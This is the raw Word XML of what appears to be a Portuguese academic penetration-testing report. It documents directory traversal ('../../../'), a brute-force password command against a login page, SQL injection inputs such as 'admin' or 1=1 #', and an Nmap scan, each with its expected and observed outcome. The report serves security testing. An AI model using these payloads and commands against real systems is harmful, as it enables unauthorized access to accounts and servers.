    <w:p w14:paraId="0E2A9355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262D543" w14:textId="77777777" w:rsidR="002C0836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4D4181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teste&amp;senha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</w:t>
      </w:r>
      <w:r w:rsidR="005B5243"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./, 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4D4181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749C2A5A" w14:textId="77777777" w:rsidR="002C0836" w:rsidRPr="004D4181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comando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“../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2611B5AF" w14:textId="77777777" w:rsidR="006C31FD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1073BF23" w14:textId="77777777" w:rsidR="006C31FD" w:rsidRPr="004D4181" w:rsidRDefault="006C31FD" w:rsidP="00136AE5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4D4181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14:paraId="43785CE9" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema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 impeça o acesso</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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7B911D26" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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9183817" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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: </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="004D4181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4D4181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14:paraId="012C7272" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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12F39B6" w14:textId="77777777" w:rsidR="00136AE5" w:rsidRPr="004D4181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C5BABC" w14:textId="77777777" w:rsidR="00136AE5" w:rsidRPr="004D4181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998571" w14:textId="77777777" w:rsidR="00136AE5" w:rsidRPr="004D4181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A118A8" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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>7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E3BA3AB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102D1A1" w14:textId="77777777" w:rsidR="006C31FD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4D4181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teste&amp;senha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=.. , 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4D4181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14:paraId="5430E6A7" w14:textId="77777777" w:rsidR="002C0836" w:rsidRPr="004D4181" w:rsidRDefault="006D580D" w:rsidP="002C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O comando</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="004D4181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gramEnd"/>
      <w:r w:rsidR="002C0836" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>..”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D7459" w14:textId="77777777" w:rsidR="006C31FD" w:rsidRPr="004D4181" w:rsidRDefault="006C31FD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663578CF" w14:textId="77777777" w:rsidR="006C31FD" w:rsidRPr="004D4181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4D4181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14:paraId="2C688E6B" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="003164B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Espera-se que o sistema bloqueie o acesso. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C63F5" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7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03739D" w14:textId="77777777" w:rsidR="002C0836" w:rsidRPr="004D4181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6B771E0E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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lastRenderedPageBreak/>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="003164B7" w:rsidRPr="004D4181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14:paraId="53C8FEFD" w14:textId="77777777" w:rsidR="009D0F86" w:rsidRPr="004D4181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0EB0C25" w14:textId="77777777" w:rsidR="00B135C4" w:rsidRPr="004D4181" w:rsidRDefault="00B135C4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3DD849" w14:textId="228C74F2" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="009C67EC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4.3.1.2</w:t>
      </w:r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 Tela </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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 - Mapeamento da hierarquia de pastas do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F3120" w14:textId="1FB8215E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</w:t>
      </w:r>
      <w:r w:rsidR="00CE16CE" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arefa realizada dia 22</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/03/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C72D7" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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: 1 hora e 30 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3E7042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F6558C3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14:paraId="0E0B00F1" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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tilizar de forma automatizada o módul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pid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a ferramen</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidR="00136AE5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36AE5" w:rsidRPr="004D4181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136AE5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36AE5" w:rsidRPr="004D4181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136AE5" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a partir da URL da tela de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B135C4"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B135C4" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00136AE5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136AE5" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P_do_servidor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B135C4" w:rsidRPr="004D418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B135C4" w:rsidRPr="004D4181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r w:rsidR="00B135C4" w:rsidRPr="004D418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B135C4" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00136AE5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="00B135C4" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da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hierarquia de diretórios do sistema armazenados dentro do servidor. </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a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os resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição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 Além disso, verificar se é possível ter acesso aos códigos da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FD7B2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1729FB4" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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0565A6A5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7B6AAC9" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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Acessar a página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utilizando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http://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proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365" w:rsidRPr="004D4181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.ph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5C2A641" w14:textId="77777777" w:rsidR="00C36925" w:rsidRPr="004D4181" w:rsidRDefault="00C3692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770DF29" w14:textId="77777777" w:rsidR="00C36925" w:rsidRPr="004D4181" w:rsidRDefault="00384949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002DEFAE" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00C3692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o sistema não permita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a visualização da hierarquia de pastas do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D509A22" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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3605D6" w14:textId="77777777" w:rsidR="00384949" w:rsidRPr="004D4181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6B8AB1CA" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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. Conforme mostra </w:t>
      </w:r>
      <w:r w:rsidR="00657669" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura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3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7"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42D3846D" w14:textId="77777777" w:rsidR="00654DEF" w:rsidRPr="004D4181" w:rsidRDefault="00654DEF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78C0EC2" w14:textId="77777777" w:rsidR="003F64B7" w:rsidRPr="004D4181" w:rsidRDefault="008A7473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69884E5A" wp14:editId="2D32CBEE">
            <wp:extent cx="1809750" cy="1276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(Editada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F50D" w14:textId="383FC12C" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00DB6E0A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>Figura 2</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="00136AE5" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a partir da tela de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00136AE5" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00136AE5" w:rsidRPr="004D418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5ABE5FD" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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7AC694C" w14:textId="77777777" w:rsidR="00F31428" w:rsidRPr="004D4181" w:rsidRDefault="00F31428" w:rsidP="00745B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14:paraId="6C505422" w14:textId="77777777" w:rsidR="00F3154F" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="038E9A4B" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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5E303E" w14:textId="3FF0F8EE" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="007013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4.3.2.1 Tela </w:t>
      </w:r>
      <w:proofErr w:type="spell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Força Bruta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D8E85" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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arefa realizada dia 01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79014F8B" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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           Duração total das sessões executadas: 1 hora e 20 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42556F6C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A059AD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14:paraId="3C9D1AB7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, abordada no subcapítulo 3.2, para encontrar, por meio de tentativa e erro, um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e um usuário e senha válidos para acessar o sistema explorado. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7216A24A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95CD97B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2A103367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Configurar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, com os parâmetros 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senha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, para que ela realize os testes de acesso com força bruta na tela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A90C997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F927129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200BFA6D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que o sistema possua proteçã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Antispam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, com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Captch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que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692FAD9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FAE02BD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61ABF76E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Indefinido. A ferramenta está esperando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parâmetros quando, a tela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só utiliza 2 na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4030F2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A282AA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7B89EC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14:paraId="71671E97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Inserir um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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de usuário válido e possíveis senhas mais comuns utilizadas para acesso de um sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D6A70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l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admin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P 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forcaBruta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htt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-post-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form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“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false”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B90D99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B4B884A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No comando acima:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB85353" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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69618C30" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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“-l” significa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utilizado no momento. Nesse caso, deve ser sempre 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”, pois foi o único usuário válido fornecido para a realização de testes no sistema explorado;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C0326" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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“-P” aponta para o arquivo contendo as senhas que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tentará utilizar para acessar o sistema;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2521B05C" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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” é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18776DF3" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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htt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-post-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form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” informa o método utilizado para fazer a requisição ao servidor: POST do protocolo HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C1C36B" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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14:paraId="7C72A5ED" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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SER é onde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eve inserir o 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válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55546EEE" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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PASS é onde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eve inserir a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senha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14:paraId="233087CA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7D6165E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0B24E0A7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Espera-se que o sistema interrompa as sessões de testes configuradas na ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB2B9B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5490FB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204AC574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O sistema não passou nos testes. Todas as sessões de testes foram executadas pela </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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 sem nenhum tipo de interrupção por parte do sistema alvo.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85A591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2D8EE1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14:paraId="6FCF3A75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C0289EB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Configurar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executar uma sessão de testes utilizando o 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, cadastrado na base de dados do sistema explorado. Além disso, usar um dicionário de senhas retiradas da </w:t>
      </w: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ista de Piores Senhas de 2015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da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plashData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[1]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08720079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888DE6D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l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admin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P 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forcaBruta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htt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-post-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form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“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false” -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9C57A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8A9B6E8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 No comando acima:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DAB719" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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1EAF2B9A" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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“-l” significa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utilizado no momento. Nesse caso, deve ser sempre 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”, pois foi o único usuário válido fornecido para a realização de testes no sistema explorado;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41286D8A" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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“-P” aponta para o arquivo contendo as senhas que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tentará utilizar para acessar o sistema;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF229F" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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” é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DFFF49" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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htt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-post-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form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” informa o método utilizado para fazer a requisição ao servidor: POST do protocolo HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60515EF8" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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14:paraId="2CB54CED" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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SER é onde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eve inserir o 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válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254EB1A" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134C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PASS é onde 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eve inserir a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senha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14:paraId="4ECC1777" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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V” é para exibir no console o resultado da operação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AD13F7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8E39524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DD5894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7F9BD8B7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que o sistema possua proteçã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Antispam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, com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Captch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que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5D21A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E9FF64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74F79842" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="007013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lastRenderedPageBreak/>
        <w:t>O sistema não passou nos testes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. Conforme mostra a Figura 1, todas as tentativas configuradas n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foram executadas com sucesso. O sistema é vulnerável ao acesso via força bruta, pois permite que várias requisições sejam feitas ao servidor por tempo indeterminado. Como não há mecanismo de bloqueio para inúmeras requisições, o sistema abre uma brecha para que senhas de acesso ao sistema possam ser descobertas após várias tentativas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5999229F" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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2D21755" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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01248" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="200213D4" wp14:editId="0ABF7C31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>158115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="3820160"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapTight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61576" w14:textId="0DC7AF40" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="00DB6E0A" w:rsidP="0070134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Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="0070134C" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado da execução de testes no campo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0070134C"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70134C" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0070134C" w:rsidRPr="004D4181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="0070134C"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6509C883" w14:textId="77777777" w:rsidR="0070134C" w:rsidRPr="004D4181" w:rsidRDefault="0070134C" w:rsidP="0070134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8373F6" w14:textId="4611AF7F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4.3.2.2 Tela </w:t>
      </w:r>
      <w:proofErr w:type="spell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SQL </w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:p>
    <w:p w14:paraId="6B0489E5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arefa realizada dia 07/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282AF4C1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: 1 hora e 40 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC4C95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412BA01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76BC51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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página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 Então, através de sessões de testes, forçar ações não autorizadas no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F231DF5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1411221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58613276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3D9B4BB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Verificar se o camp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é vulnerável a injeção de código SQL utilizando a técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F737EE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ntrada: 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admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429A909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D46969C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80CBE6E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7BF2610B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o sistema realize o tratamento do caractere aspa simples como um parâmetro regular da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C81D018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B18EE2E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46761CCC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sistema passou nos testes. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo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3C3B9FE4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71C93D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14:paraId="66421A13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0EF40D8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Inserir um texto com uma distribuição adequada de aspa simples e comentários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[8,9 e 10] como entrada no camp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, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes aos usuários cadastrados. Comentários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serão utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45974E33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Entradas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</w:p>
    <w:p w14:paraId="589FC90D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w:proofErr w:type="gramStart"/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>admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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’ or 1=1 #   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0DF5A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w:proofErr w:type="gramStart"/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>admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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’ or 1=1  -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B53B31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AC82D1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B2378B8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4ADB2128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que a aplicação realize o devido tratamento para impedir que as instruções de comentários não sejam interpretadas como comentários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5393CE2D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68597B99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4BE781F6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O sistema passou nos testes. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B718AFE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EDF6D6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232AEF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32FFB2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4882695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14:paraId="463CF094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AE63E6D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Inserir um texto utilizando uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento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o sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF59B36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ntradas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325048A0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’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o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‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFEEC14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ab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB39FD1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08070BFE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o sistema realize o tratamento de todos os caracteres informados como parâmetros regulares da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1163B471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390E0A20" w14:textId="77777777" w:rsidR="004236F4" w:rsidRPr="004D4181" w:rsidRDefault="004236F4" w:rsidP="00423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. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780DB91D" w14:textId="77777777" w:rsidR="004236F4" w:rsidRPr="004D4181" w:rsidRDefault="004236F4" w:rsidP="00F315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FB790A" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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85F2CAE" w14:textId="1B49803A" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00570E09">
      <w:pPr>
        <w:pStyle w:val="Pargrafoda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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26E78797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BD52BD" w14:textId="34BE7CD0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4.3.3.1 Atividade: Análise do servidor - Exploração via </w:t>
      </w:r>
      <w:proofErr w:type="spell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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="571BD993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arefa realizada no dia 09/04/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276D018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: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031A0496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2E9622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14:paraId="4E424D33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, abordada no subcapítulo 3.2, para descobrir portas abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atividades maliciosas podem ser desenvolvidas a partir disso.</w:t>
      </w:r>
    </w:p>
